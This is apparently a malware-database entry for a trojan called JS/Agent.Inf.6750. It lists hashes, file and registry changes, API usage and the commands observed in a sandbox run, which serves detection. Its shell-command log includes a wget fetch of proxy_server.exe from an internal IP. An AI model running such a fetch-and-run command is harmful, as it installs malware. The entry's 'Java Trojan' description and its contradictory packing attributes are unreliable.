Threat Database Trojans JS/Agent.Inf.6750

JS/Agent.Inf.6750

By Domesticus in Trojans

Threat Scorecard

Popularity Rank: 7,471
Threat Level: 90 % (High)
Infected Computers: 3,075
First Seen: September 12, 2012
Last Seen: April 6, 2026
OS(es) Affected: Windows

JS/Agent.Inf.6750 is a Java Trojan that penetrates into the affected machine in the process of exchanging information between the host computer and web environment. JS/Agent.Inf.6750 is distributed via infectious websites that encompass a malicious Java script. JS/Agent.Inf.6750 exploits system vulnerabilities to enable remote attackers control your computer system and corrupt its performance stability. JS/Agent.Inf.6750 can record your browsing activity and steal private details.

Analysis Report

General information

Family Name: Trojan.Lamer.E
Packers: UPX
Signature status: No Signature

Known Samples

MD5: f3f2376340f4bb3a86f8576582acefe5
SHA1: 1b0320a786a638bb02db842d9f6b609100cea026
SHA256: 9F9EF3E4BB52D0FF0F4C4CB5F9F7995CA6D14962A79BC668BF540047C7F2ACFF
File Size: 1.26 MB, 1260032 bytes
MD5: 7e14b176134a68e7801d9da0a8c205d5
SHA1: 6939a7643c93e3e1ccd0a0b010a81a1f9c59ea1e
SHA256: B7C008335AEDCF170312594AEB6E439A7B830C5EBEDC2947944A4A64D1BEFA34
File Size: 6.09 MB, 6094848 bytes
MD5: f8dd39933e77f097cbd87821c5ca60ab
SHA1: 2de2429a0f17846ca1be6d77c987c8ad5c40c5a5
SHA256: 01D94F1C9C288EF7B8C8CE368A2C88D361BABB7F012E14D6B4F649A561A97522
File Size: 87.04 KB, 87040 bytes
MD5: 91974f6f8886dd547f71618096658414
SHA1: 13a1125f997139b46d41f7ecd0868c9db057328e
SHA256: 0D966B55C2FFB6DCC258A5F1F82C475F101997DF631A54666390B2CE4008BA86
File Size: 94.72 KB, 94720 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File has been packed
  • File is 32-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
Show More
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name Value
Company Name
  • ICE XAKEP
  • SENAC PA
Email webmaster@f2ko.de
File Description Bat To Exe Converter
File Version
  • 1.5.2
  • 1,0,0,0
Internal Name proxy_client
Legal Copyright
  • ICE XAKEP
  • SENAC PA
Product Name
  • Bat To Exe Converter
  • proxy_client
Product Version
  • 1.5.2
  • 1,0,0,0
Thin App Build Date Time 20110629 165109
Thin App License ThinApp Packager Suite
Thin App Version 4.6.1-361923
Website http://www.f2ko.de

File Traits

  • 2+ executable sections
  • BINinO
  • No Version Info
  • packed
  • x86

Block Information

Total Blocks: 159
Potentially Malicious Blocks: 0
Whitelisted Blocks: 159
Unknown Blocks: 0

Visual Map

0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • HackKMS.TC
  • Lamer.CA
  • Lamer.CB
  • Lamer.E
  • St0rm.A
Show More
  • Wpakill.A

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
c:\3c7c.tmp\libeay32.dll Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\3c7c.tmp\libiconv2.dll Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\3c7c.tmp\libintl3.dll Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\3c7c.tmp\libssl32.dll Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\3c7c.tmp\proxy_client.bat Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\3c7c.tmp\sleep.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\3c7c.tmp\wget.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a756.tmp\modem.bat Generic Read,Write Data,Write Attributes,Write extended,Append data
Show More
c:\d7f.tmp\aspterm.bat Generic Read,Write Data,Write Attributes,Write extended,Append data

Registry Modifications

Key::Value Data API Name
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 夢閽ꤷǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
Show More
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 憱涔엾ǜ RegNtPreCreateKey

Windows API Usage

Category API
Anti Debug
  • IsDebuggerPresent
User Data Access
  • GetUserObjectInformation
Process Shell Execute
  • CreateProcess
  • ShellExecuteEx
  • WriteConsole
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
Show More
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtUnmapViewOfSection
  • ntdll.dll!NtUnmapViewOfSectionEx
  • ntdll.dll!NtWaitForAlertByThreadId
  • ntdll.dll!NtWaitForSingleObject
  • ntdll.dll!NtWaitForWorkViaWorkerFactory
  • ntdll.dll!NtWaitLowEventPair
  • ntdll.dll!NtWorkerFactoryWorkerReady
  • ntdll.dll!NtWriteFile
  • ntdll.dll!NtWriteVirtualMemory
  • UNKNOWN
  • win32u.dll!NtGdiAnyLinkedFonts
  • win32u.dll!NtGdiBitBlt
  • win32u.dll!NtGdiCreateBitmap
  • win32u.dll!NtGdiCreateCompatibleBitmap
  • win32u.dll!NtGdiCreateCompatibleDC
  • win32u.dll!NtGdiCreateDIBitmapInternal
  • win32u.dll!NtGdiCreateRectRgn
  • win32u.dll!NtGdiCreateSolidBrush
  • win32u.dll!NtGdiDeleteObjectApp
  • win32u.dll!NtGdiDoPalette
  • win32u.dll!NtGdiDrawStream
  • win32u.dll!NtGdiExtGetObjectW
  • win32u.dll!NtGdiExtTextOutW
  • win32u.dll!NtGdiFontIsLinked
  • win32u.dll!NtGdiGetCharABCWidthsW
  • win32u.dll!NtGdiGetDCDword
  • win32u.dll!NtGdiGetDCforBitmap
  • win32u.dll!NtGdiGetDCObject
  • win32u.dll!NtGdiGetDeviceCaps
  • win32u.dll!NtGdiGetDIBitsInternal
  • win32u.dll!NtGdiGetEntry
  • win32u.dll!NtGdiGetFontData
  • win32u.dll!NtGdiGetGlyphIndicesW
  • win32u.dll!NtGdiGetOutlineTextMetricsInternalW
  • win32u.dll!NtGdiGetRandomRgn
  • win32u.dll!NtGdiGetRealizationInfo
  • win32u.dll!NtGdiGetTextFaceW
  • win32u.dll!NtGdiGetTextMetricsW
  • win32u.dll!NtGdiGetWidthTable
  • win32u.dll!NtGdiHfontCreate
  • win32u.dll!NtGdiIntersectClipRect
  • win32u.dll!NtGdiQueryFontAssocInfo
  • win32u.dll!NtGdiRestoreDC
  • win32u.dll!NtGdiSaveDC
  • win32u.dll!NtGdiSelectBitmap
  • win32u.dll!NtGdiSetDIBitsToDeviceInternal

63 additional items are not displayed above.

Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Terminate
  • TerminateProcess

Shell Command Execution

open \3C7C.tmp\proxy_client.bat
c:\3C7C.tmp\sleep.exe sleep 10
c:\3C7C.tmp\wget.exe wget -c http://192.168.60.10/proxy_server.exe
open \A756.tmp\modem.bat
open \D7F.tmp\aspterm.bat
Show More
WriteConsole: 1
WriteConsole: 4372ce986174696f6e20647520707265
WriteConsole: File Not Found
WriteConsole: Could Not Find C
WriteConsole: The system canno
WriteConsole: '.\Shortcut.exe'
WriteConsole: DEBUT
WriteConsole: Test si 1 ou plu

Trending

Most Viewed

Loading...